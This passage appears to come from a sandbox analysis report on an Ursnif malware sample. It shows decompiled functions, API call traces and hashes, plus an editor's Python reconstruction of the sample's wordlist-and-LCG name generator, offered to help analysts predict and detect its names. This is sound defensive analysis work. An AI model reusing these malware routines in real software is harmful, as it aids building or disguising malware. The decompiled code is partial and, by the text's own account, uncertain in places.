                                            								}
                                            								while(1) {
                                            									L26:
                                            									_t99 = _v12;
                                            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed; lstrcmp (ref 049F71D7): compare the candidate against every name already in the table
                                            									if(_t99 == 0) {
                                            										break;
                                            									}
                                            									_v12 = _v12 + 1;
                                            									if(_v12 < _a4) {
                                            										continue;
                                            									}
                                            									goto L30;
                                            								}
                                            								_v8 = _v8 - 1;
                                            								L30:
                                            								_t97 = _a4;
                                            								_a4 = _a4 + 1;
                                            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                            								__imp__(_t124); // lstrlen (ref 049F71FB): advance the write cursor past the stored name
                                            								_v8 = _v8 + 1;
                                            								_t124 = _t124 + _t97 + 1;
                                            							} while (_v8 < _a8);
                                            							goto L31;
                                            						}
                                            					 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107; // record the start of a new word in the pointer table
                                            					_t101 = _t83;
                                            					if(_t83 - 0x61 <= 0x19) { // unsigned compare: first byte is 'a'..'z'
                                            						_t101 = _t101 - 0x20; // capitalise it, so two joined words read as CamelCase
                                            					}
                                            					 *_t107 = _t101;
                                            						_t113 = _t113 + 1;
                                            						goto L10;
                                            					}
                                            				}
                                            				if(_t118 != 0) {
                                            					if(_t118 > _v8) {
                                            						_v8 = _t118;
                                            					}
                                            					_a8 = _a8 + 1;
                                            				}
                                            				goto L21;
                                            			}

                                            Instruction addresses: 0x049f70b5 .. 0x049f7141 (one address per decompiled line above; the per-line alignment did not survive extraction)

                                            APIs
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 049F71AB
                                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 049F71C0
                                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 049F71D7
                                            • lstrlen.KERNEL32(69B25F45), ref: 049F71FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                            • String ID:
                                            • API String ID: 3214092121-3916222277
                                            • Opcode ID: e34c1a72c8f0fbf1f972f8b43410307e1364641c664d3d89633ba565a3e08a21
                                            • Instruction ID: 0a1d6801092830d21aab2120ccdd30e162a202a00b621b68314e75b08284cf49
                                            • Opcode Fuzzy Hash: e34c1a72c8f0fbf1f972f8b43410307e1364641c664d3d89633ba565a3e08a21
                                            • Instruction Fuzzy Hash: 5F517071A00108EBDF21CFD9C884AEDBBBAFF55314F1584AAEE159B201C770BA55CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%
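
                                            Read as a whole, E049F70AE above is a wordlist-driven name generator: it splits a CR/LF-separated buffer into words, capitalises each first letter, requires more than 0x20 words, then fills a table of names by joining two words picked with a 32-bit linear congruential generator (multiplier 0x19660d, increment 0x3c6ef35f) seeded from __eax, rejecting candidates that already appear in the table. The Python below is an added example written by this editor to make that logic reproducible for analysts; it is not code from the Joe Sandbox report or from the Ursnif sample. It assumes the four __imp__ calls in the loop are the lstrcpy/lstrcat/lstrcmp/lstrlen listed under APIs, that a duplicate candidate is simply retried rather than counted (the 22% decompilation quality leaves that detail uncertain), and that the table size equals the word count; the function names, the seed value and the sample wordlist are the editor's own constructions.

```python
# Added example (editor's reconstruction of E049F70AE; not code from the report
# or the sample). Assumptions: __imp__ calls are lstrcpy/lstrcat/lstrcmp/lstrlen,
# a duplicate candidate is retried, and the table holds one name per input word.
from typing import List, Optional

LCG_MUL = 0x19660D      # multiplier seen in the decompiled loop: _v20 * 0x19660d
LCG_INC = 0x3C6EF35F    # increment seen in the decompiled loop: + 0x3c6ef35f
MASK32 = 0xFFFFFFFF     # 32-bit register arithmetic
MIN_WORDS = 0x20        # the routine fails with error 0xb unless word count > 0x20


def lcg_next(state: int) -> int:
    """One step of the 32-bit LCG that the decompiled loop advances twice per name."""
    return (state * LCG_MUL + LCG_INC) & MASK32


def parse_wordlist(data: bytes) -> List[bytes]:
    """Split a CR/LF-separated buffer into words, capitalising each first letter.

    Mirrors the first loop of E049F70AE: 0x0d / 0x0a end a word, empty lines are
    skipped, and a first byte in 'a'..'z' (the unsigned `_t83 - 0x61 <= 0x19`
    test) has 0x20 subtracted.
    """
    words: List[bytes] = []
    for tok in data.replace(b"\r", b"\n").split(b"\n"):
        if not tok:
            continue
        first = tok[0]
        if 0x61 <= first <= 0x7A:
            first -= 0x20
        words.append(bytes([first]) + tok[1:])
    return words


def generate_names(seed: int, wordlist: bytes, count: Optional[int] = None) -> List[bytes]:
    """Produce `count` unique CamelCase two-word names from `wordlist` and `seed`.

    `seed` plays the role of the __eax argument (assumed to be the random state
    handed in by the caller); `count` defaults to the number of words, matching
    the `while (_v8 < _a8)` termination in the decompilation.
    """
    words = parse_wordlist(wordlist)
    if len(words) <= MIN_WORDS:
        raise ValueError("wordlist too short: E049F70AE returns error 0xb here")
    if count is None:
        count = len(words)
    state = seed & MASK32
    names: List[bytes] = []
    seen = set()
    while len(names) < count:
        state = lcg_next(state)
        first = words[state % len(words)]
        state = lcg_next(state)
        second = words[state % len(words)]
        candidate = first + second            # lstrcpy + lstrcat
        if candidate in seen:                 # lstrcmp matched an existing entry: retry
            continue
        seen.add(candidate)
        names.append(candidate)
    return names


# Constructed sample input (33 words, not the sample's real wordlist).
SAMPLE_WORDLIST = b"\r\n".join(
    w.encode() for w in (
        "apple", "bake", "cloud", "dark", "east", "field", "green", "house",
        "iron", "jump", "kind", "lamp", "moon", "north", "open", "paper",
        "quick", "river", "stone", "table", "under", "voice", "water", "extra",
        "yard", "zone", "angle", "board", "crane", "dust", "early", "fast", "glass",
    )
)

if __name__ == "__main__":
    # Arbitrary seed chosen for the demonstration; the real seed comes from the caller.
    for name in generate_names(0x12345678, SAMPLE_WORDLIST, count=5):
        print(name.decode())
```

                                            The practical use is predictive: given the seed the caller passes in __eax and the wordlist the sample carries, an analyst can enumerate the names the sample will pick without running it again, and a detection can be written for the resulting CamelCase pattern rather than for one observed value. The names themselves are only as reproducible as the two assumptions above; confirm the duplicate handling against the instructions at 049F71D0..049F71EA before relying on exact ordering.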

                                            C-Code - Quality: 100%
                                            			E049F1666(signed int _a4, signed int* _a8) {
                                            				void* __ecx;
                                            				void* __edi;
                                            				signed int _t6;
                                            				intOrPtr _t8;
                                            				intOrPtr _t12;
                                            				long _t14;
                                            				void* _t18;
                                            				WCHAR* _t19;
                                            				long _t20;
                                            				void* _t25;
                                            				signed int* _t28;
                                            				CHAR* _t30;
                                            				long _t31;
                                            				WCHAR** _t32;
                                            
                                            				_t6 =  *0x49fa310; // 0xd448b889
                                            				_t32 = _a4;
                                            				_a4 = _t6 ^ 0x109a6410;
                                            				_t8 =  *0x49fa348; // 0x57d5a8
                                            				_t3 = _t8 + 0x49fb87e; // 0x61636f4c = "Loca" as little-endian ASCII, start of the event name string
                                            				_t25 = 0;
                                            				_t30 = E049F4B16(_t3, 1);
                                            				if(_t30 != 0) {
                                            					_t25 = CreateEventA(0x49fa34c, 1, 0, _t30); // manual-reset named event built from that string
                                            					E049F4C73(_t30);
                                            				}
                                            				_t12 =  *0x49fa2fc; // 0x4000000a
                                            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                                            					L12:
                                            					_t28 = _a8;
                                            					if(_t28 != 0) {
                                            						 *_t28 =  *_t28 | 0x00000001;
                                            					}
                                            					_t14 = E049F2384(_t32, 0); // executed
                                            					_t31 = _t14;
                                            					if(_t31 == 0 && _t25 != 0) {
                                            						_t31 = WaitForSingleObject(_t25, 0x4e20); // 0x4e20 = 20000 ms timeout
                                            					}
                                            					if(_t28 != 0 && _t31 != 0) {
                                            						 *_t28 =  *_t28 & 0xfffffffe;
                                            					}
                                            					goto L20;
                                            				} else {
                                            					_t18 = E049F6DB6(); // executed
                                            					if(_t18 != 0) {
                                            						goto L12;
                                            					}
                                            					_t19 = StrChrW( *_t32, 0x20); // split the command line at the first space: program, then arguments
                                            					if(_t19 != 0) {
                                            						 *_t19 = 0;
                                            						_t19 =  &(_t19[1]);
                                            					}
                                            					_t20 = E049F3E6C(0,  *_t32, _t19, 0); // executed
                                            					_t31 = _t20;
                                            					if(_t31 == 0) {
                                            						if(_t25 == 0) {
                                            							L22:
                                            							return _t31;
                                            						}
                                            					_t31 = WaitForSingleObject(_t25, 0x4e20); // 0x4e20 = 20000 ms timeout
                                            						if(_t31 == 0) {
                                            							L20:
                                            							if(_t25 != 0) {
                                            								CloseHandle(_t25);
                                            							}
                                            							goto L22;
                                            						}
                                            					}
                                            					goto L12;
                                            				}
                                            			}

                                            APIs
                                              • Part of subcall function 049F4B16: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04F79DA0,00000000,?,?,69B25F44,00000005,049FA00C,4D283A53,?,?), ref: 049F4B4C
                                              • Part of subcall function 049F4B16: lstrcpy.KERNEL32(00000000,00000000), ref: 049F4B70
                                              • Part of subcall function 049F4B16: lstrcat.KERNEL32(00000000,00000000), ref: 049F4B78
                                            • CreateEventA.KERNEL32(049FA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,049F2AA1,?,?,?), ref: 049F16A7
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            • StrChrW.SHLWAPI(049F2AA1,00000020,61636F4C,00000001,00000000,?,?,00000000,?,049F2AA1,?,?,?), ref: 049F16DA
                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,049F2AA1,00000000,00000000,?,00000000,?,049F2AA1,?,?,?), ref: 049F1707
                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,049F2AA1,?,?,?), ref: 049F1735
                                            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,049F2AA1,?,?,?), ref: 049F174D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 73268831-0
                                            • Opcode ID: 2e286703897d6ca25bcbf75a2fda1f74d922b8192f3b92d5ae035b599087607d
                                            • Instruction ID: 22d02197c2e65db7fab65278e7133d255a82e3dc9fe7bc05742396922049e542
                                            • Opcode Fuzzy Hash: 2e286703897d6ca25bcbf75a2fda1f74d922b8192f3b92d5ae035b599087607d
                                            • Instruction Fuzzy Hash: 91210132600B11DBD7315EA89C86BAA76ACEBC8B25B190235FF19AB140DB64EC0187D4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581BAC0: RegCreateKeyA.ADVAPI32(80000001,05D7B7F0,?), ref: 0581BAD5
                                              • Part of subcall function 0581BAC0: lstrlen.KERNEL32(05D7B7F0,00000000,00000000,0582806E,?,?,?,05806B9D,00000001,00000000,?), ref: 0581BAFE
                                            • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF26
                                            • RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                            • String ID:
                                            • API String ID: 1633053242-0
                                            • Opcode ID: dfdb898152c4c1a9c87488b507abaeb6a1a2b93a8913c9983114bae6b2e5e228
                                            • Instruction ID: 5c3c3ad6fe4fba9b1c77d7d0cabf047c813c95e5b084aedfa48f8fc3e28cf980
                                            • Opcode Fuzzy Hash: dfdb898152c4c1a9c87488b507abaeb6a1a2b93a8913c9983114bae6b2e5e228
                                            • Instruction Fuzzy Hash: 9E1137B651010DBFDF119FA4DC86CAF7F6EFB48254B14486AFD01D3110DA31AD919B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 05804366
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580437F
                                            • OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?), ref: 0580439C
                                            • IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000), ref: 058043AD
                                            • FindCloseChangeNotification.KERNEL32(?,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 058043C0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                                            • String ID:
                                            • API String ID: 1712524627-0
                                            • Opcode ID: 9708ddb8a2f4c7a3e1bfb836cf5bdbe0e9746d23f93466fe35043f36e6fd8cde
                                            • Instruction ID: c99343957caa09f90ef7aa603a82b139d620a62f4ddb461a5d25f40b13c93af1
                                            • Opcode Fuzzy Hash: 9708ddb8a2f4c7a3e1bfb836cf5bdbe0e9746d23f93466fe35043f36e6fd8cde
                                            • Instruction Fuzzy Hash: 0301AD71950204EFDF60DF55DC0ACAA7FE8FB84351B119219FE05C3250EB316A81CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualProtect.KERNEL32(00000000,00000000,00000040,05801765,?,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A117
                                            • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A11F
                                            • VirtualQuery.KERNEL32(00000000,?,0000001C,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A136
                                            • VirtualProtect.KERNEL32(00000000,00000000,-2C9B417C,05801765,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A15B
                                            • SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A164
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$ErrorLastProtect$Query
                                            • String ID:
                                            • API String ID: 148356745-0
                                            • Opcode ID: 7bbdfa247dfbabd32a17452888523b67827584103c199dfc967a7f1f7d4e97a1
                                            • Instruction ID: 42ffeaacc48cf76ff7539c70627c1599303d1c3e515453d44289618e7a647d85
                                            • Opcode Fuzzy Hash: 7bbdfa247dfbabd32a17452888523b67827584103c199dfc967a7f1f7d4e97a1
                                            • Instruction Fuzzy Hash: D801E972500209BF9F12AF96DC4589ABFBDFF582547018026FD02E3160EB71E954DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.419649464.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_2cc0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: X
                                            • API String ID: 544645111-3081909835
                                            • Opcode ID: e4223aaaa941ca7609270bea9d228aba8bcdc66d6d3ef9be42c7e8713cb92b5a
                                            • Instruction ID: 755a9facb50c812c9ebc8878f6e9ac2a9da3fdd2525608524b731d9e188e0201
                                            • Opcode Fuzzy Hash: e4223aaaa941ca7609270bea9d228aba8bcdc66d6d3ef9be42c7e8713cb92b5a
                                            • Instruction Fuzzy Hash: 53B1BDB4E002288FDB54CF59C890B9DBBB1BF88304F2581AED908AB356D775A985CF41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SysAllocString.OLEAUT32(80000002), ref: 049F105D
                                            • SysAllocString.OLEAUT32(049F6ECE), ref: 049F10A1
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F10B5
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F10C3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$AllocFree
                                            • String ID:
                                            • API String ID: 344208780-0
                                            • Opcode ID: 02bc8bfb2d3f21b11a2568fcd78e07c46bbde4a7514644f892e66008ddf1f321
                                            • Instruction ID: 5e54d33d4eb70de64bff9445517f3ee5a810df9b71feaa3edb12f26b8412469e
                                            • Opcode Fuzzy Hash: 02bc8bfb2d3f21b11a2568fcd78e07c46bbde4a7514644f892e66008ddf1f321
                                            • Instruction Fuzzy Hash: 9F312F72900259EFCB04DF98D8959AE7BB9FF48300B24843EFA05D7250D775A981CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 66%
                                            			E049F5803(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                            				void* _v8;
                                            				char _v48;
                                            				void* __edi;
                                            				intOrPtr _t22;
                                            				void* _t26;
                                            				intOrPtr _t30;
                                            				intOrPtr _t37;
                                            				intOrPtr* _t43;
                                            				void* _t44;
                                            				void* _t47;
                                            				intOrPtr* _t49;
                                            				void* _t50;
                                            				intOrPtr _t51;
                                            
                                            				_t47 = __edx;
                                            				_t44 = __ecx;
                                            				_t43 = _a16;
                                            				_t49 = __eax;
                                            				_t22 =  *0x49fa348; // 0x57d5a8
                                            				_t2 = _t22 + 0x49fb682; // 0x657a6973
                                            				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
                                            				_t51 =  *0x49fa3e0; // 0x4f79ba8
                                            				_push(0x800);
                                            				_push(0);
                                            				_push( *0x49fa2d8);
                                            				if( *0x49fa2ec >= 5) {
                                            					_t26 = RtlAllocateHeap(); // executed
                                            					if(_t26 == 0) {
                                            						L6:
                                            						_a4 = 8;
                                            						L7:
                                            						if(_a4 != 0) {
                                            							L10:
                                            							 *0x49fa2ec =  *0x49fa2ec + 1;
                                            							L11:
                                            							return _a4;
                                            						}
                                            						_t52 = _a16;
                                            						 *_t49 = _a16;
                                            						_t50 = _v8;
                                            						 *_t43 = E049F2087(_t52, _t50); // executed
                                            						_t30 = E049F6D7F(_t50, _t52); // executed
                                            						if(_t30 != 0) {
                                            							 *_a8 = _t50;
                                            							 *_a12 = _t30;
                                            							if( *0x49fa2ec < 5) {
                                            								 *0x49fa2ec =  *0x49fa2ec & 0x00000000;
                                            							}
                                            							goto L11;
                                            						}
                                            						_a4 = 0xbf;
                                            						E049F3F62();
                                            						HeapFree( *0x49fa2d8, 0, _t50);
                                            						goto L10;
                                            					}
                                            					_t37 = E049F636D(_a4, _t47, _t51,  &_v48,  &_v8,  &_a16, _t26);
                                            					L5:
                                            					_a4 = _t37;
                                            					goto L7;
                                            				}
                                            				if(RtlAllocateHeap() == 0) {
                                            					goto L6;
                                            				}
                                            				_t37 = E049F59E2(_a4, _t44, _t47, _t51,  &_v48,  &_v8,  &_a16, _t38);
                                            				goto L5;
                                            			}

                                            APIs
                                            • wsprintfA.USER32 ref: 049F5825
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049F584A
                                              • Part of subcall function 049F59E2: GetTickCount.KERNEL32 ref: 049F59F6
                                              • Part of subcall function 049F59E2: wsprintfA.USER32 ref: 049F5A46
                                              • Part of subcall function 049F59E2: wsprintfA.USER32 ref: 049F5A63
                                              • Part of subcall function 049F59E2: wsprintfA.USER32 ref: 049F5A83
                                              • Part of subcall function 049F59E2: wsprintfA.USER32 ref: 049F5AAF
                                              • Part of subcall function 049F59E2: HeapFree.KERNEL32(00000000,00000000), ref: 049F5AC1
                                              • Part of subcall function 049F59E2: wsprintfA.USER32 ref: 049F5AE2
                                              • Part of subcall function 049F59E2: HeapFree.KERNEL32(00000000,00000000), ref: 049F5AF2
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049F586C
                                            • HeapFree.KERNEL32(00000000,?,?), ref: 049F58D0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: wsprintf$Heap$Free$Allocate$CountTick
                                            • String ID:
                                            • API String ID: 1428766365-0
                                            • Opcode ID: 0ecf4fd80b73a91c342357dcc4bbc4a853eef7d69f2394d8b2a606df06765385
                                            • Instruction ID: 24400de47b95af223289deb4ee187c2af2c42dfea9cd1c2fa80684e0a06af8e1
                                            • Opcode Fuzzy Hash: 0ecf4fd80b73a91c342357dcc4bbc4a853eef7d69f2394d8b2a606df06765385
                                            • Instruction Fuzzy Hash: 96313A72604209BBDB01DF94DC84EDA3BBCFB48364F118432FA09E7211E775A955DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 41%
                                            			E049F29F2(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                            				intOrPtr _v12;
                                            				void* _v16;
                                            				void* _v28;
                                            				char _v32;
                                            				void* __esi;
                                            				void* _t20;
                                            				void* _t26;
                                            				void* _t29;
                                            				void* _t38;
                                            				signed int* _t39;
                                            				void* _t40;
                                            
                                            				_t36 = __ecx;
                                            				_v32 = 0;
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosd");
                                            				_v12 = _a4;
                                            				_t20 = E049F6174(__ecx,  &_v32); // executed
                                            				_t38 = _t20;
                                            				if(_t38 != 0) {
                                            					L12:
                                            					_t39 = _a8;
                                            					L13:
                                            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                            						_t23 =  &(_t39[1]);
                                            						if(_t39[1] != 0) {
                                            							E049F75C6(_t23);
                                            						}
                                            					}
                                            					return _t38;
                                            				}
                                            				_t26 = E049F6955(0x40,  &_v16); // executed
                                            				if(_t26 != 0) {
                                            					_v16 = 0;
                                            				}
                                            				_t40 = CreateEventA(0x49fa34c, 1, 0,  *0x49fa3e4);
                                            				if(_t40 != 0) {
                                            					SetEvent(_t40);
                                            					Sleep(0xbb8); // executed
                                            					CloseHandle(_t40);
                                            				}
                                            				_push( &_v32);
                                            				if(_a12 == 0) {
                                            					_t29 = E049F737F(_t36); // executed
                                            				} else {
                                            					_push(0);
                                            					_push(0);
                                            					_push(0);
                                            					_push(0);
                                            					_push(0);
                                            					_t29 = E049F6E20(_t36);
                                            				}
                                            				_t41 = _v16;
                                            				_t38 = _t29;
                                            				if(_v16 != 0) {
                                            					E049F5147(_t41);
                                            				}
                                            				if(_t38 != 0) {
                                            					goto L12;
                                            				} else {
                                            					_t39 = _a8;
                                            					_t38 = E049F1666( &_v32, _t39);
                                            					goto L13;
                                            				}
                                            			}

                                            Instruction addresses for the listing above (per-line alignment lost in this rendering): 0x049f29f2 to 0x049f2ac6

                                            APIs
                                            • CreateEventA.KERNEL32(049FA34C,00000001,00000000,00000040,?,?,76CDF710,00000000,76CDF730), ref: 049F2A43
                                            • SetEvent.KERNEL32(00000000), ref: 049F2A50
                                            • Sleep.KERNEL32(00000BB8), ref: 049F2A5B
                                            • CloseHandle.KERNEL32(00000000), ref: 049F2A62
                                              • Part of subcall function 049F737F: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,049F2A82,?), ref: 049F73A5
                                              • Part of subcall function 049F737F: RegEnumKeyExA.KERNEL32(?,?,?,049F2A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,049F2A82), ref: 049F73EC
                                              • Part of subcall function 049F737F: WaitForSingleObject.KERNEL32(00000000,?,?,?,049F2A82,?,049F2A82,?,?,?,?,?,049F2A82,?), ref: 049F7459
                                              • Part of subcall function 049F737F: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,049F2A82,?), ref: 049F7481
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                            • String ID:
                                            • API String ID: 891522397-0
                                            • Opcode ID: 2d72d3d55e27035809f0da3805a262f5cddf02ad5f398c47c1cfa90540f60b7d
                                            • Instruction ID: df410b5d79d27c3aec793815561d6129eda9193e22440c93bd0d0fa5dc3de859
                                            • Opcode Fuzzy Hash: 2d72d3d55e27035809f0da3805a262f5cddf02ad5f398c47c1cfa90540f60b7d
                                            • Instruction Fuzzy Hash: 4C214F73D00219ABDB20AFE48C84EEE77ADEF89354B0544B5EB11A7140E775FE458BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F4E0B(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                                            				long _t26;
                                            				intOrPtr* _t38;
                                            				char* _t42;
                                            				long _t43;
                                            
                                            				if(_a4 == 0) {
                                            					L2:
                                            					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed; the _a12 slot is reused to hold the opened HKEY
                                            					_t43 = _t26;
                                            					if(_t43 == 0) {
                                            						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed; lpData = 0, so this call only returns the value type in _a8 and the size in _a4
                                            						if(_a4 == 0) {
                                            							_t43 = 0xe8; // ERROR_NO_DATA
                                            						} else {
                                            							_t42 = E049F4DF6(_a4); // buffer of _a4 bytes; released with E049F4C73 (RtlFreeHeap) if the read fails
                                            							if(_t42 == 0) {
                                            								_t43 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                            							} else {
                                            								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4); // second call reads the data into the buffer
                                            								if(_t43 != 0) {
                                            									E049F4C73(_t42);
                                            								} else {
                                            									 *_a20 = _t42; // hand the buffer to the caller
                                            									_t38 = _a24;
